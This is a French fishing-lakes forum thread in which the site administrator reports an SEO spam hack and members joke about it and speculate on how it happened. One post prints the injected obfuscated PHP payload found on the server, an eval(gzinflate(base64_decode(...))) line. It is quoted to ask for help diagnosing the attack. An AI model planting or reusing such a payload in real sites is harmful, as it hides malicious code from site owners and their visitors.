Pêche de la truite aux leurres Lacs des Pyrénées est sur Facebook
-
Pseudo:
Mot de passe:
Liste des membres - Astuces forum - Calendrier
Recherche dans le forum :
Vous n'êtes pas identifié

Sujet: Site piraté

pahu
Posts: 6365
Pertinence:
Web: www
message 10 jan 2013 - 15:51 | Site piraté  
Note du message: Notez ce message: down / up

Le site LDP a été piraté, les pirates sont a l'eau, il ne reste plus qu'à couler le bateau icon_mrgreen.gif pour qu'ils ne puissent pas revenir ...
Un texte malveillant apparaissait en début et fin de page avec des liens vers un site canadien pour le Viagra ... ceci ne se produisait que si le visiteur arrivait à partir d'un moteur de recherche.
J'ai du demander de l'aide ... ce type d'attaque est de plus en plus difficile à contrer.
Merci à ceux qui m'ont prévenu. S'il reste encore quelques résidus merci de le signaler sm6.gif
_________________
"Combien y a-t-il de lacs dans les Pyrénées? Qui les a tous vus ?" H. RUSSELL
JOS65
Posts: 9748
Pertinence:
Web: www
message 10 jan 2013 - 16:20 |  
Note du message: Notez ce message: down / up

un site pour le viagra ... je soupçonne YOCH d'avoir été trainer ces guetres par là-bas !!! icon_mrgreen.gif icon_lol.gif
_________________
JOS65
yoch64
Posts: 847
Pertinence:
message 10 jan 2013 - 19:06 |  
Note du message: Notez ce message: down / up

oups...il m'avait juré que c'était sans risques... icon_mrgreen.gif
_________________
Prefiero morir de pie que vivir de rodillas !!!
Veust
Posts: 678
Pertinence:
Web: www
message 10 jan 2013 - 19:18 |  
Note du message: Notez ce message: down / up

Héhéhé, sur google on trouve toujours en premier résultat :
Average Viagra Price - Lacs des Pyrénées

Original quand même icon_lol.gif (même si ça ne doit pas être drôle à corriger icon_exclaim.gif )
pahu
Posts: 6365
Pertinence:
Web: www
message 10 jan 2013 - 19:33 |  
Note du message: Notez ce message: down / up

Sans une intervention rapide, c'était toutes les pages qui allaient apparaître ainsi icon_eek.gif heureusement que j'ai eu de l'aide car j'ai un peu paniqué ... et pendant une heure environ le site ne fonctionnait plus par ma faute ... seul le forum fonctionnait à condition de taper directement l'adresse dans le navigateur et de ne pas passer par le "dieu" google !!!!
_________________
"Combien y a-t-il de lacs dans les Pyrénées? Qui les a tous vus ?" H. RUSSELL
JOS65
Posts: 9748
Pertinence:
Web: www
message 10 jan 2013 - 20:52 |  
Note du message: Notez ce message: down / up

google se ferait-il pirater indirectement ... ??? icon_confused.gif

. tout çà pour du viagra .... pfff ..... yoch,la prochaine fois tu feras gaffe hein ... !!! icon_lol.gif
_________________
JOS65
Obiou
Posts: 4847
Pertinence:
message 10 jan 2013 - 21:44 |  
Note du message: Notez ce message: down / up

Pahu, tout mercredi, c'était bloqué (au moins de 9 h à 18 h). j'ai même appelé Ced, tant j'ai pétoché pour ton bébé icon_wink.gif j'essayais de temps en temps, pour voir, mais ça perdurait icon_confused.gif
et même le forum était vérolé ; seuls les liens vers leurs saloperies étaient actifs, pas les nôtres. enfin, bravo et merci clap.gif sm6.gif
mais avec mon nouveau bureau, je n'ai plus le lien en favori, je dois effectivement passer par un moteur de recherche...

Dernière modification par Obiou: 10 jan 2013 - 21:44
_________________
avec des bonnes godasses, tu passes!
bardamu47
Posts: 5132
Pertinence:
message 11 jan 2013 - 08:50 |  
Note du message: Notez ce message: down / up

Bravo a ceux qui ont aidé a se débarrasser de ce spammeur, c'est pas évident ! Le net est complétement... verolé icon_mrgreen.gif par cette activité... est ce l'effet viagra !? icon_mrgreen.gif
Un occasion pour faire le point sur la protection de vos ordi perso par les differents outils antivirus et antispyware existants !
Microsoft security essential, adwcleaner, Malwarebytes personnellement me rendent pas mal de services mais il y en a d'autres....

Dernière modification par bardamu47: 11 jan 2013 - 09:05
_________________
Si, en montant, il t'arrive de te demander ce que tu fais là, c'est que tu y reviendras un jour!
Cedric09
Posts: 6021
Pertinence:
Web: www
message 11 jan 2013 - 08:52 |  
Note du message: Notez ce message: down / up

J'ai eu le message après la guerre obiou( j'ai quelques pbs avec mon tel).

Mais de mon côté je n'ai eu aucun problème d'accès au forum de la journée icon_exclaim.gif
_________________
L'homme en short
Toutes les montagnes sont belles, mais aucune ne peut égaler la beauté des Pyrénées...
pahu
Posts: 6365
Pertinence:
Web: www
message 11 jan 2013 - 12:00 |  
Note du message: Notez ce message: down / up

L'accès au forum et au site était bloqué uniquement si on arrivait depuis un moteur de recherche ...
tous les liens internes étaient alors bloqués seuls les liens vers le site canadien étaient valides.

On trouve quelques explications sur le net qui ressemblent à cette attaque
http://forum.dotclear.org/viewtopic.php?id=40783

voici le petit bout de code malveillant qui se trouvait dans certains fichiers
eval(gzinflate(base64_decode('Sy0qyi+KL0otyC8qycxL1zDQtHbIzEvOKU1Jjc/PS07VUIkPdg0Kcw2KVnLxdw71dfULiQ/y9w9RitVT10/LLyrN1S/JSM1NLdZPzkksLs4sLE3Vz8xNTAcKZCbn5wEpBT39tMycVHVNawA=')));

Comment est-ce possible ?
Si une personne a pu ajouter du code dans un fichier, c'est :

- soit qu'elle a accès au mot de passe et l'a fait en ftp

- soit qu'il y a une faille dans le site qui permet à un visiteur d'ouvrir un fichier et de modifier son contenu.
Je dois vérifier tous les bouts de code qui ouvrent et écrivent dans des fichiers icon_mrgreen.gif
_________________
"Combien y a-t-il de lacs dans les Pyrénées? Qui les a tous vus ?" H. RUSSELL
Cedric09
Posts: 6021
Pertinence:
Web: www
message 11 jan 2013 - 12:32 |  
Note du message: Notez ce message: down / up

Vu ce que tu nous montres, je pense qu tu as été victime d'une injection PHP dans la fonction eval()....
Faut que tu regardes dans la partie inscription du forum ou dans un formulaire de contact si tu en as.

Recherche la fonction eval() et si les paramètres que tu y passes viennent d'un utilisateur, faudra les sécuriser.
icon_wink.gif

Regardes ici : http://www.php.net/manual/fr/function.eval.php#75389

Désolé c'est peut être du chinois pour 99% d'entre vous mais bon...

Dernière modification par Cedric09: 11 jan 2013 - 12:34
_________________
L'homme en short
Toutes les montagnes sont belles, mais aucune ne peut égaler la beauté des Pyrénées...
Looping
Posts: 2991
Pertinence:
message 11 jan 2013 - 12:41 |  
Note du message: Notez ce message: down / up

A mon avis, ces liens foireux ne renvoyaient pas les internautes sur le vrai site LDP.com mais sur une "copie vérolée" du site (hébergée sur un autre serveur), cas classique de phishing. Il aurait suffi de vérifier sur quelle adresse renvoyait le lien en question pour en être sûr.(sur chrome clic droit/Inspecter l'élément)

D'ailleurs si certains ont rentré leurs identifiants sur la version vérolée du site, ils devraient le changer dès aujourd'hui par prudence.
Looping
Posts: 2991
Pertinence:
message 11 jan 2013 - 12:47 |  
Note du message: Notez ce message: down / up

Je viens de voir les 4 liens en dessous et en "inspectant" les liens, on voit bien les 4 lignes de codes correspondant aux 4 liens, 3 liens renvoient sur le vrai site, et l'autre sur un autre site qui est surement la copie dont vous parlez (j'ai pas été jusqu'à cliquer dessus icon_mrgreen.gif )
pahu
Posts: 6365
Pertinence:
Web: www
message 11 jan 2013 - 13:47 |  
Note du message: Notez ce message: down / up

Cedric09 a écrit:
Désolé c'est peut être du chinois pour 99% d'entre vous mais bon...

En particulier je dois vérifier si les variables utilisées sont bien nettoyées si elles viennent de l'url, par exemple
$variable= fopen($dstName, "w");
$variable = fopen($nom_fichier_cache, "w");

tout ceci n'est pas simple ... et moi aussi je suis parfois dépassé surtout pour le javasript et certaines requettes sql en php.
Heureusement que je peux avoir un peu d'aide, je n'aurai jamais pu développer le site sans l'aide de mon fils qui dès le départ m'a obligé à utiliser une base de donnée.
Le forum, c'est le bébé d'achigan... icon_wink.gif , ce n'est pas la dernière version mais comme c'est très stable et que tout le monde veille (merci) je ne change rien ...

Looping a écrit:
Je viens de voir les 4 liens en dessous et en "inspectant" les liens, on voit bien les 4 lignes de codes correspondant aux 4 liens, 3 liens renvoient sur le vrai site,
Je ne comprends pas ???

Looping a écrit:
A mon avis, ces liens foireux ne renvoyaient pas les internautes sur le vrai site LDP.com mais sur une "copie vérolée" du site (hébergée sur un autre serveur)/quote]
Non ... je ne pense pas. Il suffit d'un tout petit bout de code pour modifier pas mal de choses ....
Aucun lien du site n'était valide lorsque il a été piraté, donc à priori personne n'a pu se connecter s'il était hors ligne.

_________________
"Combien y a-t-il de lacs dans les Pyrénées? Qui les a tous vus ?" H. RUSSELL
bardamu47
Posts: 5132
Pertinence:
message 11 jan 2013 - 18:00 |  
Note du message: Notez ce message: down / up



_________________
Si, en montant, il t'arrive de te demander ce que tu fais là, c'est que tu y reviendras un jour!


<< Partagez très simplement des photos sur ce site en quelques clicks et sans avoir besoin d'utiliser un site dédié aux hébergements de vos images affichant souvent une publicité excessive! >>
Obiou
Posts: 4847
Pertinence:
message 11 jan 2013 - 18:53 |  
Note du message: Notez ce message: down / up

tu es sûr que ce sont les Pussy Riots, Barda fish4.gif
c'est encore : " mal voir bite" (qui te rend pas mal de services, certes...) qui t'aura abusé icon_biggrin.gif
ce n'est pas du chinois, Céd, c'est du mutant... new_alien.gif

Dernière modification par Obiou: 11 jan 2013 - 18:53
_________________
avec des bonnes godasses, tu passes!
Looping
Posts: 2991
Pertinence:
message 11 jan 2013 - 18:57 |  
Note du message: Notez ce message: down / up

Je vais imager Pahu si je suis pas clair (en même temps, je dis peut-être des âneries car je ne suis pas un spécialiste).
Si je vais sur Google faire une recherche j'ai ça :



J'imagine que les liens foireux dont vous parlez sont les 4 que j'ai entouré en rouge.
Pour ouvrir la console en bas de la fenêtre, sur chrome je fais donc clic-droit sur le lien 3 dans mon exemple, puis Inspecter l'élément, la partie concernant ce lien est surlignée dans la console.
Les liens 1,2 et 4 renvoient bien ici (sur ton site), le lien 2 a une apparence foireuse seulement mais il doit renvoyer sur la vraie page du site "La Pêche en lac de montagne" (à vérifier).
Quant au lien 3, on voit bien qu'il ne renvoie pas ici.

Dernière modification par Looping: 11 jan 2013 - 19:06

<< Partagez très simplement des photos sur ce site en quelques clicks et sans avoir besoin d'utiliser un site dédié aux hébergements de vos images affichant souvent une publicité excessive! >>
SPO
Posts: 3572
Pertinence:
message 11 jan 2013 - 19:18 |  
Note du message: Notez ce message: down / up

sm6.gif Barda, c'est ma belle-mère, je l'ai reconnu icon_exclaim.gif icon_wink.gif icon_lol.gif
_________________
On a les poissons qu'on mérite...
pahu
Posts: 6365
Pertinence:
Web: www
message 11 jan 2013 - 21:01 |  
Note du message: Notez ce message: down / up

Looping a écrit:
Les liens 1,2 et 4 renvoient bien ici (sur ton site), le lien 2 a une apparence foireuse seulement mais il doit renvoyer sur la vraie page du site "La Pêche en lac de montagne" (à vérifier).
Quant au lien 3, on voit bien qu'il ne renvoie pas ici.

Merci pour la copie d'écran ...
Je n'avais compris que tu parlais des liens sur les pages google qui sont au dessous du lien principal.
Effectivement pour le lien 3 il y avait danger et je ne suis pas allé voir...
Je suis juste allé sur la page modifiée (lien 0) qui renvoyait sur le serveur LDP,
on tombait alors sur la page habituelle mais avec du texte au dessous et au dessous icon_wink.gif qui comportaient des liens vers un site de viagra au Canada!
Tous les liens du site LDP étaient désactivés donc impossible de sortir de cette page sans la fermer.

Par contre si on accédait au site directement en tapant le lien dans son navigateur, ou à l'aide d'un raccourci, il n'y avait aucun problème, on pouvait naviguer sur le site et le forum sans se rendre compte du problème.

Comment est-ce possible? j'ai testé avec un autre navigateur (bing) le problème était le même.
_________________
"Combien y a-t-il de lacs dans les Pyrénées? Qui les a tous vus ?" H. RUSSELL
Looping
Posts: 2991
Pertinence:
message 12 jan 2013 - 10:40 |  
Note du message: Notez ce message: down / up

Les liens proposés sur Google ont changé ce matin, y'en a toujours un vers un site foireux.
(de quel lien 0 tu parles Pahu ?)

Inviter des personnes à lire ce sujet...
(entrez un pseudo ou une adresse email par ligne)
Chercher un membre
Texte pour les destinataires / invités (facultatif):

Votre email:
(En étant abonné, vous recevrez un mail dés qu'une prochaine réponse sera envoyée)

Rechercher dans - Astuces forum

Navigation :
Forum issu du site www.achigan.net - France - © 2003-2017 - Hébergement pro: oxyweb


Page générée en 0.112s. - 27 requêtes sql -
Ce site utilise des cookies - En savoir plus - X
8 visiteurs (liste) en ce moment